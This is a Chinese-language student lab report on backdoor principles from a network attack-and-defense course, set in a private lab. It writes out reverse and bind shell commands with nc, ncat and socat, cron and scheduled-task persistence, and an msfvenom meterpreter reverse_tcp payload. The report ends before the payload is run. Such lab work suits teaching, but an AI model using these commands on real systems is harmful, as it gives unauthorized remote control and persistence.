20145338《網絡對抗》 後門原理與實踐

《網絡對抗》Exp2 後門原理與實踐

基礎問題回答

·例舉你能想到的一個後門進入到你係統中的可能方式？
在網上下載軟件的時候，後門頗有可能被捆綁在下載的軟件當中；瀏覽網頁的時候，點的一些小廣告可能會被植入後門。
·例舉你知道的後門如何啓動起來(win及linux)的方式？
Windows下在控制面板的管理工具中能夠設置任務計劃啓動，或者經過修改註冊表來達到自啓的目的；對後門程序進行假裝，例如重命名成某個遊戲的開始程序之類的，誘騙用戶點擊啓動；Linux下能夠經過cron來啓動。
·Meterpreter有哪些給你映像深入的功能？
直接經過指令獲取主機的攝像頭有點6，有點像電影裏的黑客；獲取擊鍵記錄也能獲得不少信息，好比登陸什麼網站的密碼，或者說和某人的重要聊天記錄之類的，都很是容易被人竊取到進行分析；導出密碼文件功能簡直是有點無解，這樣一來你的電腦至關因而透明的；後門進程的遷移，這樣即便有管理員去查看運行的進程也很難發現後門的存在；使用後滲透攻擊模塊POST能夠對主機進行更深刻的攻擊。
·如何發現本身有系統有沒有被安裝後門？
沒有通過免殺處理的後門程序可能很容易就被殺毒工具掃出來，不過通常如今這樣的後門也不多了；檢查防火牆開啓的端口和它對應的進程，若是不是系統默認開啓的端口都有嫌疑，找到對應的進程，對其進行抓包分析；下載專門的監控軟件，對操做系統中的進程進行監控，看是否存在異常。

實踐過程

用nc獲取遠程主機的Shell

linux ip:

windows ip:

·linux獲取windows的shell

1.在kali下使用命令nc -l -p 5338對端口5338開始監聽

2.下載老師的附件ncat.rar,解壓後放在一個能夠找到路徑的文件夾下
在windows的cmd下輸入ncat.exe -e cmd.exe 192.168.19.128 5338 實現Windows反彈鏈接Linux

3.Kali下能夠看到Windows的命令提示，能夠輸入Windows命令：

windows獲取linux的shell

1.windows 打開監聽，端口爲5338,ncat.exe -l -p 5338

2.Linux進行反彈鏈接win

3.windows下得到一個linux shell，運行ls

cron啓動

·使用crontab -e修改配置文件，根據格式m h dom mon dow user command來填寫啓動的時間

·使用crontab -l查看配置文件

kali系統內每分鐘自動運行指令，反彈至pc端的5338端口

使用socat獲取主機操做Shell

1.linux上用socat tcp-listen:5338把cmd綁定到端口5338
2.socat tcp-l:5338 system:bash,pty,stderrlinux反彈鏈接win

3.windows使用socat readline tcp:192.168.19.128：5338開啓監聽,監聽成功後可進行任何操做，此處執行ls

任務計劃啓動

1.在Windows系統下，打開控制面板->管理工具->任務計劃程序，建立任務，填寫任務名稱後，新建一個觸發器：

2.在操做->程序或腳本中選擇你的socat.exe文件的路徑，在添加參數一欄填寫tcp-listen:5338 exec:cmd.exe,pty,stderr，這個命令的做用是把cmd.exe綁定到端口5338，同時把cmd.exe的stderr重定向到stdout上：

3.建立完成以後，按Windows+L快捷鍵鎖定計算機，再次打開時，能夠發現以前建立的任務已經開始運行：

4.此時，在Kali環境下輸入指令socat - tcp:192.168.199.153:5338，這裏的第一個參數-表明標準的輸入輸出，第二個流鏈接到Windows主機的5338端口，此時能夠發現已經成功得到了一個cmd shell：

Meterpreter

3.1 生成20145338.exe

·輸入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.153 LPORT=5338 -f exe > 20145338.exe
生成後門程序：

·經過nc指令將生成的後門程序傳送到Windows主機上：

·在Kali上使用msfconsole指令進入msf控制檯，使用監聽模塊，設置payload，設置反彈回連的IP和端口：

·設置完成後，執行監聽：

·接下來應該是要打開Windows上的後門程序，但是我拷不了個人exe從個人虛擬機到個人主機。。。。。